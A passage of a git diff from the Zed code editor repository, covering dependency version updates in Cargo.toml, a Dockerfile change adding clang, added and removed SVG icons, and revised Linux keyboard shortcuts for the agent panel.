path = "crates/zed" } zed_actions = { path = "crates/zed_actions" } +zed_credentials_provider = { path = "crates/zed_credentials_provider" } zed_env_vars = { path = "crates/zed_env_vars" } edit_prediction = { path = "crates/edit_prediction" } zeta_prompt = { path = "crates/zeta_prompt" } @@ -477,12 +483,11 @@ ztracing_macro = { path = "crates/ztracing_macro" } # External crates # -agent-client-protocol = { version = "=0.9.4", features = ["unstable"] } +agent-client-protocol = { version = "=0.10.2", features = ["unstable"] } aho-corasick = "1.1" alacritty_terminal = { git = "https://github.com/zed-industries/alacritty", rev = "9d9640d4" } any_vec = "0.14" anyhow = "1.0.86" -arrayvec = { version = "0.7.4", features = ["serde"] } ashpd = { version = "0.13", default-features = false, features = [ "async-io", "notification", @@ -493,7 +498,7 @@ ashpd = { version = "0.13", default-features = false, features = [ ] } async-channel = "2.5.0" async-compat = "0.2.1" -async-compression = { version = "0.4", features = ["gzip", "futures-io"] } +async-compression = { version = "0.4", features = ["bzip2", "gzip", "futures-io"] } async-dispatcher = "0.1" async-fs = "2.1" async-lock = "2.1" @@ -515,7 +520,6 @@ aws-smithy-runtime-api = { version = "1.9.2", features = ["http-1x", "client"] } aws-smithy-types = { version = "1.3.4", features = ["http-body-1-x"] } backtrace = "0.3" base64 = "0.22" -bincode = "1.2.1" bitflags = "2.6.0" brotli = "8.0.2" bytes = "1.0" @@ -540,23 +544,35 @@ criterion = { version = "0.5", features = ["html_reports"] } ctor = "0.4.0" dap-types = { git = "https://github.com/zed-industries/dap-types", rev = "1b461b310481d01e02b2603c16d7144b926339f8" } dashmap = "6.0" -derive_more = "0.99.17" +derive_more = { version = "2.1.1", features = [ + "add", + "add_assign", + "deref", + "deref_mut", + "display", + "from_str", + "mul", + "mul_assign", + "not", +] } dirs = "4.0" documented = "0.9.1" dotenvy = "0.15.0" +dunce = "1.0" ec4rs = "1.1" emojis = "0.6.1" env_logger = "0.11" encoding_rs = "0.8" exec = "0.3.1" -fancy-regex = "0.16.0" +fancy-regex = "0.17.0" fork = "0.4.0" futures = "0.3" futures-concurrency = "7.7.1" futures-lite = "1.13" -gh-workflow = { git = "https://github.com/zed-industries/gh-workflow", rev = "c9eac0ed361583e1072860d96776fa52775b82ac" } +gh-workflow = { git = "https://github.com/zed-industries/gh-workflow", rev = "37f3c0575d379c218a9c455ee67585184e40d43f" } git2 = { version = "0.20.1", default-features = false, features = ["vendored-libgit2"] } globset = "0.4" +heapless = "0.9.2" handlebars = "4.3" heck = "0.5" heed = { version = "0.21.0", features = ["read-txn-no-tls"] } @@ -565,7 +581,6 @@ human_bytes = "0.4.1" html5ever = "0.27.0" http = "1.1" http-body = "1.0" -hyper = "0.14" ignore = "0.4.22" image = "0.25.1" imara-diff = "0.1.8" @@ -576,25 +591,28 @@ itertools = "0.14.0" json_dotpath = "1.1" jsonschema = "0.37.0" jsonwebtoken = "10.0" -jupyter-protocol = "1.2.0" +jupyter-protocol = "1.4.0" jupyter-websocket-client = "1.0.0" libc = "0.2" libsqlite3-sys = { version = "0.30.1", features = ["bundled"] } linkify = "0.10.0" +libwebrtc = "0.3.26" +livekit = { version = "0.7.32", features = ["tokio", "rustls-tls-native-roots"] } log = { version = "0.4.16", features = ["kv_unstable_serde", "serde"] } -lsp-types = { git = "https://github.com/zed-industries/lsp-types", rev = "a4f410987660bf560d1e617cb78117c6b6b9f599" } +lsp-types = { git = "https://github.com/zed-industries/lsp-types", rev = "c7396459fefc7886b4adfa3b596832405ae1e880" } mach2 = "0.5" markup5ever_rcdom = "0.3.0" metal = "0.33" -minidumper = "0.8" +minidumper = "0.9" moka = { version = "0.12.10", features = ["sync"] } -naga = { version = "28.0", features = ["wgsl-in"] } +naga = { version = "29.0", features = ["wgsl-in"] } nanoid = "0.4" -nbformat = "1.1.0" +nbformat = "1.2.0" nix = "0.29" num-format = "0.4.4" objc = "0.2" -objc2-foundation = { version = "=0.3.1", default-features = false, features = [ +objc2-app-kit = { version = "0.3", default-features = false, features = [ "NSGraphics" ] } +objc2-foundation = { version = "=0.3.2", default-features = false, features = [ "NSArray", "NSAttributedString", "NSBundle", @@ -628,18 +646,21 @@ parse_int = "0.9" pciid-parser = "0.8.0" pathdiff = "0.2" percent-encoding = "2.3.2" -pet = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" } -pet-conda = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" } -pet-core = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" } -pet-fs = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" } -pet-poetry = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" } -pet-reporter = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" } -pet-virtualenv = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "d5b5bb0c4558a51d8cc76b514bc870fd1c042f16" } +pet = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" } +pet-conda = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" } +pet-core = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" } +pet-fs = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" } +pet-poetry = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" } +pet-reporter = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" } +pet-virtualenv = { git = "https://github.com/microsoft/python-environment-tools.git", rev = "9e61a22af989fe54937bf07c9f9cff1bc53d9056" } portable-pty = "0.9.0" postage = { version = "0.5", features = ["futures-traits"] } pretty_assertions = { version = "1.3.0", features = ["unstable"] } proc-macro2 = "1.0.93" profiling = "1" +# replace this with main when #635 is merged +proptest = { git = "https://github.com/proptest-rs/proptest", rev = "3dca198a8fef1b32e3a66f1e1897c955b4dc5b5b", features = ["attr-macro"] } +proptest-derive = "0.8.0" prost = "0.9" prost-build = "0.9" prost-types = "0.9" @@ -660,10 +681,10 @@ reqwest = { git = "https://github.com/zed-industries/reqwest.git", rev = "c15662 "stream", ], package = "zed-reqwest", version = "0.12.15-zed" } rsa = "0.9.6" -runtimelib = { version = "1.2.0", default-features = false, features = [ +runtimelib = { version = "1.4.0", default-features = false, features = [ "async-dispatcher-runtime", "aws-lc-rs" ] } -rust-embed = { version = "8.4", features = ["include-exclude"] } +rust-embed = { version = "8.11", features = ["include-exclude"] } rustc-hash = "2.1.0" rustls = { version = "0.23.26" } rustls-platform-verifier = "0.5.0" @@ -678,7 +699,6 @@ serde_json_lenient = { version = "0.2", features = [ "raw_value", ] } serde_path_to_error = "0.1.17" -serde_repr = "0.1" serde_urlencoded = "0.7" sha2 = "0.10" shellexpand = "2.1.0" @@ -707,9 +727,8 @@ time = { version = "0.3", features = [ "formatting", "local-offset", ] } -tiny_http = "0.8" +tiny_http = "0.12" tokio = { version = "1" } -tokio-tungstenite = { version = "0.26", features = ["__rustls-tls"] } tokio-socks = { version = "0.5.2", default-features = false, features = [ "futures-io", "tokio", @@ -721,7 +740,7 @@ toml_edit = { version = "0.22", default-features = false, features = [ "serde", ] } tower-http = "0.4.4" -tree-sitter = { version = "0.26", features = ["wasm"] } +tree-sitter = { version = "0.26.8", features = ["wasm"] } tree-sitter-bash = "0.25.1" tree-sitter-c = "0.24.1" tree-sitter-cpp = { git = "https://github.com/tree-sitter/tree-sitter-cpp", rev = "5cb9b693cfd7bfacab1d9ff4acac1a4150700609" } @@ -741,7 +760,7 @@ tree-sitter-md = { git = "https://github.com/tree-sitter-grammars/tree-sitter-ma tree-sitter-python = "0.25" tree-sitter-regex = "0.24" tree-sitter-ruby = "0.23" -tree-sitter-rust = "0.24" +tree-sitter-rust = "0.24.2" tree-sitter-typescript = { git = "https://github.com/zed-industries/tree-sitter-typescript", rev = "e2c53597d6a5d9cf7bbe8dccde576fe1e46c5899" } # https://github.com/tree-sitter/tree-sitter-typescript/pull/347 tree-sitter-yaml = { git = "https://github.com/zed-industries/tree-sitter-yaml", rev = "baff0b51c64ef6a1fb1f8390f3ad6015b83ec13a" } tracing = "0.1.40" @@ -756,7 +775,7 @@ uuid = { version = "1.1.2", features = ["v4", "v5", "v7", "serde"] } walkdir = "2.5" wasm-encoder = "0.221" wasmparser = "0.221" -wasmtime = { version = "33", default-features = false, features = [ +wasmtime = { version = "36", default-features = false, features = [ "async", "demangle", "runtime", @@ -765,12 +784,13 @@ wasmtime = { version = "33", default-features = false, features = [ "incremental-cache", "parallel-compilation", ] } -wasmtime-wasi = "33" +wasmtime-wasi = "36" wax = "0.7" which = "6.0.0" -wasm-bindgen = "0.2.104" +wasm-bindgen = "0.2.113" web-time = "1.1.0" -wgpu = "28.0" +webrtc-sys = "0.3.23" +wgpu = { git = "https://github.com/zed-industries/wgpu.git", branch = "v29" } windows-core = "0.61" yawc = "0.2.5" zeroize = "1.8" @@ -781,17 +801,20 @@ zstd = "0.11" version = "0.61" features = [ "Foundation_Numerics", + "Globalization_DateTimeFormatting", "Storage_Search", "Storage_Streams", "System_Threading", "UI_ViewManagement", "Wdk_System_SystemServices", + "Win32_Foundation", "Win32_Globalization", "Win32_Graphics_Direct3D", "Win32_Graphics_Direct3D11", "Win32_Graphics_Direct3D_Fxc", "Win32_Graphics_DirectComposition", "Win32_Graphics_DirectWrite", + "Win32_Graphics_DirectManipulation", "Win32_Graphics_Dwm", "Win32_Graphics_Dxgi", "Win32_Graphics_Dxgi_Common", @@ -806,6 +829,7 @@ features = [ "Win32_System_Com", "Win32_System_Com_StructuredStorage", "Win32_System_Console", + "Win32_System_Diagnostics_Debug", "Win32_System_DataExchange", "Win32_System_IO", "Win32_System_LibraryLoader", @@ -813,6 +837,7 @@ features = [ "Win32_System_Ole", "Win32_System_Performance", "Win32_System_Pipes", + "Win32_System_RestartManager", "Win32_System_SystemInformation", "Win32_System_SystemServices", "Win32_System_Threading", @@ -822,6 +847,7 @@ features = [ "Win32_UI_HiDpi", "Win32_UI_Input_Ime", "Win32_UI_Input_KeyboardAndMouse", + "Win32_UI_Input_Pointer", "Win32_UI_Shell", "Win32_UI_Shell_Common", "Win32_UI_Shell_PropertiesSystem", @@ -835,6 +861,9 @@ notify = { git = "https://github.com/zed-industries/notify.git", rev = "ce58c24c notify-types = { git = "https://github.com/zed-industries/notify.git", rev = "ce58c24cad542c28e04ced02e20325a4ec28a31d" } windows-capture = { git = "https://github.com/zed-industries/windows-capture.git", rev = "f0d6c1b6691db75461b732f6d5ff56eed002eeb9" } calloop = { git = "https://github.com/zed-industries/calloop" } +livekit = { git = "https://github.com/zed-industries/livekit-rust-sdks", rev = "147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1" } +libwebrtc = { git = "https://github.com/zed-industries/livekit-rust-sdks", rev = "147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1" } +webrtc-sys = { git = "https://github.com/zed-industries/livekit-rust-sdks", rev = "147fbca3d4b592d96d33f5e6a84b59fc0b5d9bf1" } [profile.dev] split-debuginfo = "unpacked" @@ -894,7 +923,6 @@ sidebar = { codegen-units = 1 } snippet = { codegen-units = 1 } snippets_ui = { codegen-units = 1 } story = { codegen-units = 1 } -supermaven_api = { codegen-units = 1 } telemetry_events = { codegen-units = 1 } theme_selector = { codegen-units = 1 } time_format = { codegen-units = 1 } diff --git a/Dockerfile-collab b/Dockerfile-collab index 63359334906b58c560c0ed6acc6378259ccbd5c5..fbbcb0df0484c26a65823171cc976de8cb838b8c 100644 --- a/Dockerfile-collab +++ b/Dockerfile-collab @@ -1,6 +1,6 @@ # syntax = docker/dockerfile:1.2 -FROM rust:1.93-bookworm as builder +FROM rust:1.94-bookworm as builder WORKDIR app COPY . . @@ -14,8 +14,12 @@ ARG GITHUB_SHA ENV GITHUB_SHA=$GITHUB_SHA # Also add `cmake`, since we need it to build `wasmtime`. +# clang is needed because `webrtc-sys` uses Clang-specific compiler flags. RUN apt-get update; \ - apt-get install -y --no-install-recommends cmake + apt-get install -y --no-install-recommends cmake clang + +ENV CC=clang +ENV CXX=clang++ RUN --mount=type=cache,target=./script/node_modules \ --mount=type=cache,target=/usr/local/cargo/registry \ diff --git a/REVIEWERS.conl b/REVIEWERS.conl index 82086b7f42cbb123487030cf7d2e64fc1288cbd2..85cdb3ee89c10b1bfb567a0007a603cc01f922c7 100644 --- a/REVIEWERS.conl +++ b/REVIEWERS.conl @@ -122,6 +122,5 @@ vim = @probably-neb windows - = @localcc = @reflectronic = @Veykril diff --git a/assets/icons/ai.svg b/assets/icons/ai.svg deleted file mode 100644 index 4236d50337bef92cb550cdbf71d83843ab35e2f3..0000000000000000000000000000000000000000 --- a/assets/icons/ai.svg +++ /dev/null @@ -1,27 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/assets/icons/ai_open_code.svg b/assets/icons/ai_open_code.svg new file mode 100644 index 0000000000000000000000000000000000000000..304b155188c2286a4f8cab208872d0373d8099f1 --- /dev/null +++ b/assets/icons/ai_open_code.svg @@ -0,0 +1,3 @@ + + + diff --git a/assets/icons/archive.svg b/assets/icons/archive.svg new file mode 100644 index 0000000000000000000000000000000000000000..9ffe3f39d27c7fe5cbb532a4f263c8800398e96f --- /dev/null +++ b/assets/icons/archive.svg @@ -0,0 +1,5 @@ + + + + + diff --git a/assets/icons/box_open.svg b/assets/icons/box_open.svg new file mode 100644 index 0000000000000000000000000000000000000000..5e30fc40c3446485412e2a2607b0d07dc2f68b4b --- /dev/null +++ b/assets/icons/box_open.svg @@ -0,0 +1,6 @@ + + + + + + diff --git a/assets/icons/cog.svg b/assets/icons/cog.svg deleted file mode 100644 index 7dd3a8befff59b5aaa0506df9b2cd7140725ab81..0000000000000000000000000000000000000000 --- a/assets/icons/cog.svg +++ /dev/null @@ -1 +0,0 @@ - diff --git a/assets/icons/diff_split.svg b/assets/icons/diff_split.svg index de2056466f7ef1081ee00dabb8b4d5baa8fc9217..dcafeb8df5c28bcac1f1fe8cf5783eebd8d8cd8a 100644 --- a/assets/icons/diff_split.svg +++ b/assets/icons/diff_split.svg @@ -1,5 +1,4 @@ - - - + + diff --git a/assets/icons/diff_split_auto.svg b/assets/icons/diff_split_auto.svg new file mode 100644 index 0000000000000000000000000000000000000000..f9dd7076be75aaf3e90286140a60deece5016114 --- /dev/null +++ b/assets/icons/diff_split_auto.svg @@ -0,0 +1,7 @@ + + + + + + + diff --git a/assets/icons/diff_unified.svg b/assets/icons/diff_unified.svg index b2d3895ae5466454e9cefc4e77e3c3f2a19cde8c..28735c16f682159b6b0a099176d6fc3b75cd248e 100644 --- a/assets/icons/diff_unified.svg +++ b/assets/icons/diff_unified.svg @@ -1,4 +1,4 @@ - - + + diff --git a/assets/icons/ellipsis_vertical.svg b/assets/icons/ellipsis_vertical.svg deleted file mode 100644 index c38437667ebbe095aaa4be27244997a9138bf659..0000000000000000000000000000000000000000 --- a/assets/icons/ellipsis_vertical.svg +++ /dev/null @@ -1,5 +0,0 @@ - - - - - diff --git a/assets/icons/eye_off.svg b/assets/icons/eye_off.svg new file mode 100644 index 0000000000000000000000000000000000000000..3057c3050c36c72be314f9b0646d44932c52e4ee --- /dev/null +++ b/assets/icons/eye_off.svg @@ -0,0 +1,6 @@ + + + + + + diff --git a/assets/icons/file_icons/editorconfig.svg b/assets/icons/file_icons/editorconfig.svg new file mode 100644 index 0000000000000000000000000000000000000000..81355bec4603e678c3b1d1097d00ef03da5edf7f --- /dev/null +++ b/assets/icons/file_icons/editorconfig.svg @@ -0,0 +1,3 @@ + + + diff --git a/assets/icons/file_icons/gitlab.svg b/assets/icons/file_icons/gitlab.svg new file mode 100644 index 0000000000000000000000000000000000000000..f0faf570b125c7764e769ae60f7a6ce6f7825ceb --- /dev/null +++ b/assets/icons/file_icons/gitlab.svg @@ -0,0 +1 @@ + diff --git a/assets/icons/file_icons/helm.svg b/assets/icons/file_icons/helm.svg new file mode 100644 index 0000000000000000000000000000000000000000..03e702f2d5081c4e96ff4db7ba7428817b08748f --- /dev/null +++ b/assets/icons/file_icons/helm.svg @@ -0,0 +1 @@ + diff --git a/assets/icons/file_icons/yaml.svg b/assets/icons/file_icons/yaml.svg new file mode 100644 index 0000000000000000000000000000000000000000..2c3efd46cd45ff67d6c46d84476d563dd5ac3a73 --- /dev/null +++ b/assets/icons/file_icons/yaml.svg @@ -0,0 +1 @@ + diff --git a/assets/icons/folder_plus.svg b/assets/icons/folder_plus.svg new file mode 100644 index 0000000000000000000000000000000000000000..a543448ed6197043291369bee640e23b6ad729b9 --- /dev/null +++ b/assets/icons/folder_plus.svg @@ -0,0 +1,5 @@ + + + + + diff --git a/assets/icons/git_merge_conflict.svg b/assets/icons/git_merge_conflict.svg new file mode 100644 index 0000000000000000000000000000000000000000..10bc2c04fc9877112723273b0d60351c3a4c56bc --- /dev/null +++ b/assets/icons/git_merge_conflict.svg @@ -0,0 +1,7 @@ + + + + + + + diff --git a/assets/icons/git_worktree.svg b/assets/icons/git_worktree.svg new file mode 100644 index 0000000000000000000000000000000000000000..25b49bc69f34d8a742451709d4d4a164f29248b6 --- /dev/null +++ b/assets/icons/git_worktree.svg @@ -0,0 +1,7 @@ + + + + + + + diff --git a/assets/icons/list_collapse.svg b/assets/icons/list_collapse.svg index f18bc550b90228c2f689848b86cfc5bea3d6ff50..dbdb2aaa4537c25ba1867d4957c23819af425835 100644 --- a/assets/icons/list_collapse.svg +++ b/assets/icons/list_collapse.svg @@ -1 +1,7 @@ - + + + + + + + diff --git a/assets/icons/maximize_alt.svg b/assets/icons/maximize_alt.svg new file mode 100644 index 0000000000000000000000000000000000000000..b8b8705f902c2469ed959f93f89ca3caf3b8fc51 --- /dev/null +++ b/assets/icons/maximize_alt.svg @@ -0,0 +1,6 @@ + + + + + + diff --git a/assets/icons/menu_alt.svg b/assets/icons/menu_alt.svg deleted file mode 100644 index b9cc19e22febe045ca9ccf4a7e86d69b258f875c..0000000000000000000000000000000000000000 --- a/assets/icons/menu_alt.svg +++ /dev/null @@ -1,3 +0,0 @@ - - - diff --git a/assets/icons/new_thread.svg b/assets/icons/new_thread.svg new file mode 100644 index 0000000000000000000000000000000000000000..19b8fa25ea30ed47a57a5d5f83d62f2b4b56b61e --- /dev/null +++ b/assets/icons/new_thread.svg @@ -0,0 +1,4 @@ + + + + diff --git a/assets/icons/open_folder.svg b/assets/icons/open_folder.svg new file mode 100644 index 0000000000000000000000000000000000000000..c4aa32b29cc1048fd4ecd8b1b4d32b68ae0a8ad3 --- /dev/null +++ b/assets/icons/open_folder.svg @@ -0,0 +1,4 @@ + + + + diff --git a/assets/icons/queue_message.svg b/assets/icons/queue_message.svg new file mode 100644 index 0000000000000000000000000000000000000000..1bdf6738bcf3143fc13a820281cf1cab8531bd36 --- /dev/null +++ b/assets/icons/queue_message.svg @@ -0,0 +1,7 @@ + + + + + + + diff --git a/assets/icons/shield_check.svg b/assets/icons/shield_check.svg deleted file mode 100644 index 43b52f43a8d70beb6e69c2271235090db4dc2c00..0000000000000000000000000000000000000000 --- a/assets/icons/shield_check.svg +++ /dev/null @@ -1,4 +0,0 @@ - - - - diff --git a/assets/icons/signal_high.svg b/assets/icons/signal_high.svg new file mode 100644 index 0000000000000000000000000000000000000000..6c1fec96098242444407fb9f66a025d03a10e50b --- /dev/null +++ b/assets/icons/signal_high.svg @@ -0,0 +1,6 @@ + + + + + + diff --git a/assets/icons/signal_low.svg b/assets/icons/signal_low.svg new file mode 100644 index 0000000000000000000000000000000000000000..b0ebccdd4c8897e8fdaf013a56cc4498dc5e0fe7 --- /dev/null +++ b/assets/icons/signal_low.svg @@ -0,0 +1,6 @@ + + + + + + diff --git a/assets/icons/signal_medium.svg b/assets/icons/signal_medium.svg new file mode 100644 index 0000000000000000000000000000000000000000..3652724dc8b095dd68eb9977108711e71ffe67cb --- /dev/null +++ b/assets/icons/signal_medium.svg @@ -0,0 +1,6 @@ + + + + + + diff --git a/assets/icons/stop.svg b/assets/icons/stop.svg index cc2bbe9207acf5acd44ff13e93140099d222250b..5ca9cd29edf17981500482b81e47aa53a16e2713 100644 --- a/assets/icons/stop.svg +++ b/assets/icons/stop.svg @@ -1,3 +1,3 @@ - + diff --git a/assets/icons/swatch_book.svg b/assets/icons/swatch_book.svg deleted file mode 100644 index b37d5df8c1a5f0f6b9fa9cb46b3004a2ba55da4f..0000000000000000000000000000000000000000 --- a/assets/icons/swatch_book.svg +++ /dev/null @@ -1 +0,0 @@ - diff --git a/assets/icons/sweep_ai.svg b/assets/icons/sweep_ai.svg deleted file mode 100644 index 9c63c810dd9e164c14c1ad1a1bca9c6ec68fc95e..0000000000000000000000000000000000000000 --- a/assets/icons/sweep_ai.svg +++ /dev/null @@ -1 +0,0 @@ - diff --git a/assets/icons/sweep_ai_disabled.svg b/assets/icons/sweep_ai_disabled.svg deleted file mode 100644 index b15a8d8526f36f312482effefd3d7538ce5f7a04..0000000000000000000000000000000000000000 --- a/assets/icons/sweep_ai_disabled.svg +++ /dev/null @@ -1 +0,0 @@ - diff --git a/assets/icons/sweep_ai_down.svg b/assets/icons/sweep_ai_down.svg deleted file mode 100644 index f08dcb171811c761cd13c4efd0ef0acdc78f9951..0000000000000000000000000000000000000000 --- a/assets/icons/sweep_ai_down.svg +++ /dev/null @@ -1 +0,0 @@ - diff --git a/assets/icons/sweep_ai_error.svg b/assets/icons/sweep_ai_error.svg deleted file mode 100644 index 95285a1273e72ec4f02cb23e3c2fb39460f42761..0000000000000000000000000000000000000000 --- a/assets/icons/sweep_ai_error.svg +++ /dev/null @@ -1 +0,0 @@ - diff --git a/assets/icons/sweep_ai_up.svg b/assets/icons/sweep_ai_up.svg deleted file mode 100644 index 7c28282a6a14c47561a50ab456c0bec2e05b07cc..0000000000000000000000000000000000000000 --- a/assets/icons/sweep_ai_up.svg +++ /dev/null @@ -1 +0,0 @@ - diff --git a/assets/icons/terminal_ghost.svg b/assets/icons/terminal_ghost.svg deleted file mode 100644 index 7d0d0e068e8a6f01837e860e8223690a95541769..0000000000000000000000000000000000000000 --- a/assets/icons/terminal_ghost.svg +++ /dev/null @@ -1,4 +0,0 @@ - - - - diff --git a/assets/icons/text_thread.svg b/assets/icons/text_thread.svg deleted file mode 100644 index aa078c72a2f35d2b82e90f2be64d23fcda3418a5..0000000000000000000000000000000000000000 --- a/assets/icons/text_thread.svg +++ /dev/null @@ -1,7 +0,0 @@ - - - - - - - diff --git a/assets/icons/thread.svg b/assets/icons/thread.svg index 496cf42e3a3ee1439f36b8e2479d05564362e628..569a6f3aec7e3b8742d3d7d23fe11db5aea199ba 100644 --- a/assets/icons/thread.svg +++ b/assets/icons/thread.svg @@ -1,3 +1,4 @@ - + + diff --git a/assets/icons/thread_import.svg b/assets/icons/thread_import.svg new file mode 100644 index 0000000000000000000000000000000000000000..a56b5a7cccc09c5795bfadff06f06d15833232f3 --- /dev/null +++ b/assets/icons/thread_import.svg @@ -0,0 +1,5 @@ + + + + + diff --git a/assets/icons/threads_sidebar_left_closed.svg b/assets/icons/threads_sidebar_left_closed.svg new file mode 100644 index 0000000000000000000000000000000000000000..feb1015254635ef65f90f2c9ea38efab74d01d60 --- /dev/null +++ b/assets/icons/threads_sidebar_left_closed.svg @@ -0,0 +1,5 @@ + + + + + diff --git a/assets/icons/threads_sidebar_left_open.svg b/assets/icons/threads_sidebar_left_open.svg new file mode 100644 index 0000000000000000000000000000000000000000..8057b060a84d7d7ffcf29aff1c0c79a8764edc22 --- /dev/null +++ b/assets/icons/threads_sidebar_left_open.svg @@ -0,0 +1,5 @@ + + + + + diff --git a/assets/icons/threads_sidebar_right_closed.svg b/assets/icons/threads_sidebar_right_closed.svg new file mode 100644 index 0000000000000000000000000000000000000000..10fa4b792fd65b5875dcf2cadab1fc12a123ab47 --- /dev/null +++ b/assets/icons/threads_sidebar_right_closed.svg @@ -0,0 +1,5 @@ + + + + + diff --git a/assets/icons/threads_sidebar_right_open.svg b/assets/icons/threads_sidebar_right_open.svg new file mode 100644 index 0000000000000000000000000000000000000000..23a01eb3f82a5866157220172c868ed9ded46033 --- /dev/null +++ b/assets/icons/threads_sidebar_right_open.svg @@ -0,0 +1,5 @@ + + + + + diff --git a/assets/icons/tool_read.svg b/assets/icons/tool_read.svg deleted file mode 100644 index d22e9d8c7da9ba04fe194339d787e40637cf5257..0000000000000000000000000000000000000000 --- a/assets/icons/tool_read.svg +++ /dev/null @@ -1,7 +0,0 @@ - - - - - - - diff --git a/assets/icons/tool_regex.svg b/assets/icons/tool_regex.svg deleted file mode 100644 index 818c2ba360bc5aca3d4a7bf8ab65a03a2efe235e..0000000000000000000000000000000000000000 --- a/assets/icons/tool_regex.svg +++ /dev/null @@ -1,4 +0,0 @@ - - - - diff --git a/assets/icons/workspace_nav_closed.svg b/assets/icons/workspace_nav_closed.svg deleted file mode 100644 index ed1fce52d6826a4d10299f331358ff84e4caa973..0000000000000000000000000000000000000000 --- a/assets/icons/workspace_nav_closed.svg +++ /dev/null @@ -1,5 +0,0 @@ - - - - - diff --git a/assets/icons/workspace_nav_open.svg b/assets/icons/workspace_nav_open.svg deleted file mode 100644 index 464b6aac73c2aeaa9463a805aabc4559377bbfd3..0000000000000000000000000000000000000000 --- a/assets/icons/workspace_nav_open.svg +++ /dev/null @@ -1,5 +0,0 @@ - - - - - diff --git a/assets/keymaps/default-linux.json b/assets/keymaps/default-linux.json index 9b8f2d337b1f1073bca818cf0b9c66773a3ce4e9..5ecca68e0404b400af2c285dc51df0a65d6fe07a 100644 --- a/assets/keymaps/default-linux.json +++ b/assets/keymaps/default-linux.json @@ -31,7 +31,6 @@ "ctrl-+": ["zed::IncreaseBufferFontSize", { "persist": false }], "ctrl--": ["zed::DecreaseBufferFontSize", { "persist": false }], "ctrl-0": ["zed::ResetBufferFontSize", { "persist": false }], - "ctrl-,": "zed::OpenSettings", "ctrl-alt-,": "zed::OpenSettingsFile", "ctrl-q": "zed::Quit", "f4": "debugger::Start", @@ -149,7 +148,6 @@ "ctrl-f": "buffer_search::Deploy", "ctrl-h": "buffer_search::DeployReplace", "ctrl->": "agent::AddSelectionToThread", - "ctrl-<": "assistant::InsertIntoEditor", "ctrl-alt-e": "editor::SelectEnclosingSymbol", "ctrl-shift-backspace": "editor::GoToPreviousChange", "ctrl-shift-alt-backspace": "editor::GoToNextChange", @@ -186,7 +184,7 @@ }, }, { - "context": "Editor && jupyter && !ContextEditor", + "context": "Editor && jupyter", "bindings": { "ctrl-shift-enter": "repl::Run", "ctrl-alt-enter": "repl::RunInPlace", @@ -204,6 +202,7 @@ { "context": "Editor && editor_agent_diff", "bindings": { + "alt-y": "agent::Keep", "ctrl-alt-y": "agent::Keep", "ctrl-alt-z": "agent::Reject", "shift-alt-y": "agent::KeepAll", @@ -214,35 +213,17 @@ { "context": "AgentDiff", "bindings": { + "alt-y": "agent::Keep", "ctrl-alt-y": "agent::Keep", "ctrl-alt-z": "agent::Reject", "shift-alt-y": "agent::KeepAll", "shift-alt-z": "agent::RejectAll", }, }, - { - "context": "ContextEditor > Editor", - "bindings": { - "ctrl-enter": "assistant::Assist", - "ctrl-s": "workspace::Save", - "save": "workspace::Save", - "ctrl-<": "assistant::InsertIntoEditor", - "shift-enter": "assistant::Split", - "ctrl-r": "assistant::CycleMessageRole", - "enter": "assistant::ConfirmCommand", - "alt-enter": "editor::Newline", - "ctrl-k c": "assistant::CopyCode", - "ctrl-g": "search::SelectNextMatch", - "ctrl-shift-g": "search::SelectPreviousMatch", - "ctrl-k l": "agent::OpenRulesLibrary", - "ctrl-shift-v": "agent::PasteRaw", - }, - }, { "context": "AgentPanel", "bindings": { "ctrl-n": "agent::NewThread", - "ctrl-alt-n": "agent::NewTextThread", "ctrl-shift-h": "agent::OpenHistory", "ctrl-alt-c": "agent::OpenSettings", "ctrl-alt-p": "agent::ManageProfiles", @@ -253,16 +234,20 @@ "alt-tab": "agent::CycleFavoriteModels", // `alt-l` is provided as an alternative to `alt-tab` as the latter breaks on Linux under the `AgentPanel` context "alt-l": "agent::CycleFavoriteModels", - "ctrl-shift-j": "agent::ToggleNavigationMenu", - "ctrl-alt-i": "agent::ToggleOptionsMenu", + "shift-alt-j": "agent::ToggleNavigationMenu", + "shift-alt-i": "agent::ToggleOptionsMenu", "ctrl-alt-shift-n": "agent::ToggleNewThreadMenu", + "ctrl-shift-t": "agent::CycleStartThreadIn", "shift-alt-escape": "agent::ExpandMessageEditor", "ctrl->": "agent::AddSelectionToThread", "ctrl-shift-e": "project_panel::ToggleFocus", "ctrl-shift-enter": "agent::ContinueThread", - "ctrl-y": "agent::AllowOnce", + "shift-alt-q": "agent::AllowAlways", + "shift-alt-a": "agent::AllowOnce", "ctrl-alt-a": "agent::OpenPermissionDropdown", - "ctrl-alt-z": "agent::RejectOnce", + "shift-alt-x": "agent::RejectOnce", + "ctrl-tab": "agents_sidebar::ToggleThreadSwitcher", + "ctrl-shift-tab": ["agents_sidebar::ToggleThreadSwitcher", { "select_last": true }], }, }, { @@ -273,13 +258,6 @@ "ctrl-c": "markdown::CopyAsMarkdown", }, }, - { - "context": "AgentPanel && text_thread", - "bindings": { - "ctrl-n": "agent::NewTextThread", - "ctrl-alt-t": "agent::NewThread", - }, - }, { "context": "AgentPanel && acp_thread", 